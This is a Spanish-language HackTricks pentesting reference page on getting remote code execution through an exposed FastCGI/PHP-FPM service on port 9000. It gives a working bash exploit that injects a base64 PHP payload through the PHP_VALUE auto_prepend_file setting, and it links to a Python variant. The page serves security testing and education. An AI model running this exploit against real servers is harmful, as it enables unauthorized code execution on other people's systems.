mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
51 lines
2.9 KiB
Markdown
51 lines
2.9 KiB
Markdown
|
# Información Básica
|
||
|
|
||
|
Si desea **aprender qué es FastCGI**, consulte la siguiente página:
|
||
|
|
||
|
{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %}
|
||
|
[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
Por defecto, **FastCGI** se ejecuta en el puerto **9000** y no es reconocido por nmap. **Por lo general**, FastCGI solo escucha en **localhost**.
|
||
|
|
||
|
# RCE
|
||
|
|
||
|
Es bastante fácil hacer que FastCGI ejecute código arbitrario:
|
||
|
```bash
|
||
|
#!/bin/bash
|
||
|
|
||
|
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
|
||
|
FILENAMES="/var/www/public/index.php" # Exisiting file path
|
||
|
|
||
|
HOST=$1
|
||
|
B64=$(echo "$PAYLOAD"|base64)
|
||
|
|
||
|
for FN in $FILENAMES; do
|
||
|
OUTPUT=$(mktemp)
|
||
|
env -i \
|
||
|
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
|
||
|
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
|
||
|
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
|
||
|
|
||
|
cat $OUTPUT
|
||
|
done
|
||
|
```
|
||
|
También puedes utilizar el siguiente script en Python: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
|
||
|
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
|
||
|
- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
||
|
- Consigue la [**merchandising oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
|
||
|
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
|
||
|
- **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
|
||
|
</details>
|